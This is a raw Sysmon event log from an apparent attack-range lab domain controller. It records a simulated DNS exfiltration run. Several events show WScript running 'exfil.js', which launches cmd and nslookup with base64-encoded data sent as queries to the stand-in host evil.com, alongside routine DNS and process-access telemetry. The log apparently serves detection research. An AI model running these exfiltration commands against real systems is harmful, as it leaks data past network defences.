14:21:25.550{2E1864BB-18E0-629A-6742-000000005F02}39762560C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-B842-000000005F02}7464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.565{2E1864BB-18E5-629A-B842-000000005F02}7464C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlowdo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.550{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwbaf.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.534{2E1864BB-18E5-629A-B642-000000005F02}46366004C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-B742-000000005F02}5704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.534{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.534{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.534{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-B742-000000005F02}5704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.534{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.518{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.518{2E1864BB-18E5-629A-B542-000000005F02}32121044C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-B742-000000005F02}5704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.532{2E1864BB-18E5-629A-B742-000000005F02}5704C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-B542-000000005F02}3212C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwbaf.tmp 2>&1 10341000x8000000000000000206661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.503{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-B642-000000005F02}4636C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.503{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-B642-000000005F02}4636C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.503{2E1864BB-18E5-629A-B642-000000005F02}46366004C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-B542-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.487{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-B642-000000005F02}4636C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000206657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.050{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50462- 354300x8000000000000000206656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.050{00000000-0000-0000-0000-000000000000}2604<unknown process>-udptruefalse127.0.0.1-50462-false127.0.0.1-53domain 354300x8000000000000000206655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.050{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50461- 354300x8000000000000000206654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.050{00000000-0000-0000-0000-000000000000}2604<unknown process>-udpfalsefalse127.0.0.1-50460-false127.0.0.1-53domain 354300x8000000000000000206653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.050{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50460- 354300x8000000000000000206652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.050{00000000-0000-0000-0000-000000000000}2604<unknown process>-udptruefalse127.0.0.1-50460-false127.0.0.1-53domain 354300x8000000000000000206651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.986{00000000-0000-0000-0000-000000000000}1736<unknown process>-udpfalsefalse127.0.0.1-50459-false127.0.0.1-53domain 354300x8000000000000000206650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.986{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61163-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.985{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61163-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.985{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50459- 354300x8000000000000000206647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.985{00000000-0000-0000-0000-000000000000}1736<unknown process>-udptruefalse127.0.0.1-50459-false127.0.0.1-53domain 354300x8000000000000000206646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.985{00000000-0000-0000-0000-000000000000}1736<unknown process>-udpfalsefalse127.0.0.1-50458-false127.0.0.1-53domain 354300x8000000000000000206645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.985{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50458- 354300x8000000000000000206644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.985{00000000-0000-0000-0000-000000000000}1736<unknown process>-udptruefalse127.0.0.1-50458-false127.0.0.1-53domain 354300x8000000000000000206643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.984{00000000-0000-0000-0000-000000000000}1736<unknown process>-udpfalsefalse127.0.0.1-50457-false127.0.0.1-53domain 10341000x8000000000000000206642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.487{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.487{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000206640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.984{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50457- 354300x8000000000000000206639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.984{00000000-0000-0000-0000-000000000000}1736<unknown process>-udptruefalse127.0.0.1-50457-false127.0.0.1-53domain 10341000x8000000000000000206638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.487{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-B542-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000206637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.907{00000000-0000-0000-0000-000000000000}7712<unknown process>-udpfalsefalse127.0.0.1-50456-false127.0.0.1-53domain 10341000x8000000000000000206636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.487{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.487{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000206634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.907{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50456- 354300x8000000000000000206633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.907{00000000-0000-0000-0000-000000000000}7712<unknown process>-udptruefalse127.0.0.1-50456-false127.0.0.1-53domain 10341000x8000000000000000206632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.487{2E1864BB-18E0-629A-6742-000000005F02}39764812C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-B542-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000206631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.907{00000000-0000-0000-0000-000000000000}7712<unknown process>-udpfalsefalse127.0.0.1-50455-false127.0.0.1-53domain 354300x8000000000000000206630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.907{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50455- 354300x8000000000000000206629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.907{00000000-0000-0000-0000-000000000000}7712<unknown process>-udptruefalse127.0.0.1-50455-false127.0.0.1-53domain 154100x8000000000000000206628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.487{2E1864BB-18E5-629A-B542-000000005F02}3212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwbaf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000206627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.907{00000000-0000-0000-0000-000000000000}7712<unknown process>-udpfalsefalse127.0.0.1-50454-false127.0.0.1-53domain 354300x8000000000000000206626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.907{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50454- 354300x8000000000000000206625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.906{00000000-0000-0000-0000-000000000000}7712<unknown process>-udptruefalse127.0.0.1-50454-false127.0.0.1-53domain 354300x8000000000000000206624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.838{00000000-0000-0000-0000-000000000000}6160<unknown process>-udpfalsefalse127.0.0.1-50453-false127.0.0.1-53domain 354300x8000000000000000206623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.838{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63173-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.837{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63173-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.837{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50453- 